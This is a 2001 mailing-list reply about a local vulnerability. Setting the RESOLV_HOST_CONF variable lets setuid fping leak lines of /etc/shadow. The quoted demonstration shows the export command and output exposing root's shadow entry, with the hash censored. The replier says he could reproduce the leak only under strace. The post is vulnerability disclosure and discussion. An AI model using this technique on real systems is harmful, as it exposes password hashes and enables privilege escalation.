Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability

[Julian Gilbey <J.D.Gilbey@qmw.ac.uk>]

On Mon, Jan 08, 2001 at 05:57:23PM +0000, thomas lakofski wrote:
> Since I've not had any response yet, I thought I'd give a demonstration of how
> nasty this is:
> 
>   Script started on Mon Jan  8 17:48:23 2001
>   thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
>   thomas@io:~$ ping localhost
>   PING localhost (127.0.0.1): 56 data bytes
> 
>   --- localhost ping statistics ---
>   2 packets transmitted, 0 packets received, 100% packet loss
>   thomas@io:~$ fping localhost
>   /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'
> 
>   [snip]

Most weird.  I get this behaviour when running through a setuid root
strace, but I don't get the error messages (and hence the content of
/etc/shadow) when I don't use strace.  I'm still running potato.

   Julian

-- 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

         Julian Gilbey, Dept of Maths, Queen Mary, Univ. of London
       Debian GNU/Linux Developer,  see http://people.debian.org/~jdg
  Donate free food to the world's hungry: see http://www.thehungersite.com/